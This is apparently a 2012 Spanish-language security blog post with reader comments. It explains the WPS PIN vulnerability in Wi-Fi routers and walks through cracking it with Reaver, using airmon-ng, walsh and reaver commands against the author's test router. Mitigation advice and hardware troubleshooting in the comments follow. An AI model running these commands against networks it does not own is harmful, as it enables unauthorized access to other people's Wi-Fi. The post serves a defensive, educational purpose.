Hace un tiempo escribi sobre los problemas de conectarse atraves de redes inalambricas y hoy voy a seguir en el tema, por que la seguridad como siempre es un estado mental y siempre hay alguien que viene a perturbarnos este estado y esta ves espero ser yo. ¿Por que? por que hoy en día es normal contar con una notebook o un dispositivo que se conecte a internet atraves de WiFi y normalmente la gente piensa que teniendo una buena password en estos equipos es mas se suficiente, bueno … depende del caso, por ejemplo si utilizamos WEP no importa cuan larga sea la password, es facilmente crackeable, WPA/WPA2 promete ser la mas segura … peeeero, siempre hay un pero.
WPA es segura? bueno, si utilizamos una password larga y con un nivel de complejidad coherente suele ser muy dificil crackearla, salvo que tengamos un diccionario de passwords lo suficientemente completo como para engancharla atraves del uso de fuerza bruta, bueno, al menos hasta ahora, la realidad es que existe una vulnerabilidad en los dispositivos que utilizan WPS (WiFi Protected Setup), que es un pin que permite al usuario conectar dispositivos a redes Wifi tocando un par de botones.
Este pin de 8 digitos numericos es mucho mas vulnerable que la password del WPA, de hecho en un par de horas podemos hacernos con la password WPA una ves que el pin WPS fue descubierto.
Lo loco, y al contrario de lo que piensa mucha gente, esta vulnerabilidad fue descubierta por dos personas independientemente una de la otra, Stefan Viehböck y Craig Heffnet, este ultimo desarrollo una aplicacion (que es la que mostraremos en este post por que es la que tiene mayor compatibilidad con dispositivos WiFi) que hace uso de esta vulnerabilidad para poder obtener el pin y subsecuentemente la clave WPA, esta aplicacion nombrada Reaver, puede ser descargada desde Google Code.
Como siempre digo, antes de protejernos debemos saber como atacar asi que vamo a ver como usar este programa, supongo que ya lo han bajado, el proximo paso es compilarlo e instalarlo.
Para compilarlo utilizamos el flujo basico de compilacion de Linux, dentro del directorio src ejecutamos los siguiente comandos
./configure
make
sudo make install
Si todo fue bien, lo primero que debemos hacer es poner nuestra placa en modo monitor:
sudo airmon-ng wlan0 start
Ese comando pone en modo monitor a nuestro dispositivo, permitiendonos escuchar en modo promiscuo todo el trafico WiFi que circunda nuestro espacio aero (el que puede captar nuestra antena obviamente), con esto estamos listos para empezar a utilizar el reaver.
Este software viene con una aplicacion muy util que nos permite identificar los routers vulnerables, asi pues identifiquemos lo que tenemos a mano, en este caso es un router de prueba que utilizo para estos menesteres:
$ sudo walsh -i mon0
Scanning for supported APs...
68:7F:74:A3:47:D5 APTEST
...
Con el BSSID hexadesimal de nuestro objetivo identificado solo resta ejecutar el reaver, como vemos acontinuacion:
sudo reaver -i mon0 -b 68:7F:74:A3:47:D5 -vv -d 0 --ignore-locks
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacom from 68:7F:74:A3:47:D5
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 6
[+] Associated with 68:7F:74:A3:47:D5 (ESSID: APTEST)
[+] Trying pin 30492312
[!] Warning: Receive timeout occured
...
Y listo … un par de horitas y tenemos nuestra red completamente insegurizada.
Ahora … ¿como podemos hacer para mitigar este agujero de seguridad? bien … solo tenemos que desactivar el WPS, pero en algunos routers aunque deshabilitemos el pin WPS esto sigue pasando, asi que nos quedara un agujero de seguridad constante … filtar MAC, puede ayudar, pero si alguien tiene el conocimento para entrar en nuestra red, hay que dar por hecho de que el filtro no sirve para nada, ya que las MACs con facilmente clonables. Actualizar el firmware, podria llegar a ayudar para aumentar el tiempo en los que un dispositivo queda bloqueado, pero tarde o temprano podrian llegar a crackearnos el pin, asi que … en princio solo queda esperar que nuestro router no deje activado WPS cuando lo desactivemos.
Para mas info sobre esta vulnerabilidad pueden ver las notas del US-CERT.
Saludos y por favor tengan en cuenta que la seguridad es importante, como alguna ves lo dije, asegurar virtualmente nuestra casa es tan importante como la seguridad fisica.
#1 by Gus Carracedo on 10/01/2012 - 12:34
Muy buen articulo y muy util!
Siempre desconfié de la clave del modem de Fibertel, ahora te hago una cosulta.
La verdad que no pude hacerlo funcionar, me pasa lo siguiente.
Después de:
# airmon-ng start eth1 (esa es mi wifi)
>eth1 Unknown wl (monitor mode enabled)
(me quedo sin internet)
# walsh -i mon0
>[X] ERROR: Failed to open ‘mon0′ for capturing
Probé con:
# walsh -i eth1
>[X] ERROR: Failed to compile packet filter
Como puedo saber cual es el equivalente a mon0 en mi equipo?!
Gracias!!
PD: uso Fedora 16.
Resultado de iwconfig
lo no wireless extensions.
p6p1 no wireless extensions.
eth1 IEEE 802.11 ESSID:”" Nickname:”"
Mode:Managed Frequency:2.462 GHz Access Point: Not-Associated
Bit Rate:54 Mb/s Tx-Power:24 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Power Managementmode:All packets received
Link Quality=5/5 Signal level=0 dBm Noise level=-92 dBm
Rx invalid nwid:0 Rx invalid crypt:148 Rx invalid frag:0
Tx excessive retries:15 Invalid misc:0 Missed beacon:0
#2 by TheCoffeMaker on 10/01/2012 - 14:26
Claro, el problema es que necesitas una placa que te permita ponerla en modo promiscuo, o modo monitor, si no contas con una de estas placas wifi (por ejemplo placas con chip RTL8187) no vas a poder.
¿Que placa tenes? (con lspci podes fijarte, probablemente sea una pci, sino lusb si es USB)
#3 by Gus Carracedo on 10/01/2012 - 15:02
El resultado de lspci es:
> 02:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)
Despues de googlear un poco encontre esta tabla de tarjetas compatibles
http://linuxwireless.org/en/users/Drivers/b43#Known_PCI_devices
Y en Fedora Forums decian que la mejor forma de darse cuenta es obteniendo el PCI ID de la placa con esto:
$ lspci -vnn | grep 14e4
>02:00.0 Network controller [0280]: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller [14e4:4727] (rev 01)
El PCI ID de la placa es el numero entre [ ], en mi caso 14e4:4727
Y, efectivamente, mi tarjeta aparece con un hermoso NO :p
También encontré este post en T!
http://www.taringa.net/posts/linux/8076795/_Ubuntu_-Broadcom-BCM4313-y-Aircrack-_funciona_.html
Que dicen que cambiando el driver funciona, en la oficina no puedo hacerlo porque si me quedo sin WiFi no tengo donde conectarme así que después pruebo y aviso el resultado.
Gracias!!
#4 by Pablo on 10/01/2012 - 16:18
Excelente articulo, la verdad es que como soy DEMASIADO pesado WPA2+Filtrado de MAC Address es simplemente lo más seguro que conseguí, igual lo voy a probar
Muchas gracias!
#5 by TheCoffeMaker on 10/01/2012 - 17:07
Pablo, si … filtrar las macs es una opcion … pero es más para que te sientas un más seguro vos, la realidad que si alguien tiene el conocimiento suficiente como para configurar todo lo necesario para hacer bruteforce de WPA y/o esta nueva vulnerabilidad seguramente tambien sabe como identificar los clientes (es el paso basico de todo testeo de vulnerabilidades) y por ende saber sus MAC y concecuetemente clonar estas MACs para que el router piense que le esta hablando a una MAC “conocida”. Para mas info busca macchanger
#6 by Pablo on 10/01/2012 - 17:10
Cierto, muy cierto. igual me deja un poco mas tranquilo
#7 by Alex on 18/01/2012 - 3:00
Disculparas la pregunta muy ingenua, no se nada de redes y estas cosas por el estilo pero me gustaría saber si es que existe la posibilidad de que alguien se conecte a mi red inalámbrica (por supuesto) sin que yo lo detecte, es decir de algún modo invisible o simplemente que “aparezca” sin que yo lo pueda notar, espero haberme explicado. De antemano gracias.
#8 by TheCoffeMaker on 18/01/2012 - 21:41
Claro que si … sobre todo cuando no sabes como hacer monitoreo proactivo … hay muchas aplicaciones para hacer eso … pero por ahora te aconsejo que desactives el WPS, si es que tu router tiene WPS, y utilices una buenas contraseñas (largas y con signos, números y letras mayúsculas y minúsculas) para minimizar el riesgo, de todas formas tenes que fijarte si desactivandolo el WPS sigue funcionando.
#9 by TheCoffeMaker on 20/01/2012 - 16:34
Perdón, no había visto la entrada y me quedo filtrada por el tema de los links ¬_¬ … igual todo bien
… así que te pido disculpas por la demora … la verdad … yo tengo la misma placa, pero el driver la placa no tiene soporte para ponerla en modo monitoreo … lamentablemente es así, yo también estuve en la misma y hasta pase por los mismos links, pero lamentablemente el hardware no se lo banca.
Te recomiendo que te pidas una de las placas ALFA que te tiran por la cabeza en DealExtreme … las podes conseguir desde los u$s14.61 (dolares yankis) el articulo tiene el código SKU 30605 … hay mas caras y mas potentes (unos 10 dolares mas) pero la relación precio satisfacción es incomparable ^_^
#10 by Alex on 27/01/2012 - 16:20
Gracias Thecoffemaker voy a estudiar un poco mas acerca de WPS y eso del pass mas largo y combinado lo estoy tomando en cuenta, gracias por tu tiempo…
#11 by Alex on 27/01/2012 - 16:23
Ah también estudiare lo del monitoreo proactivo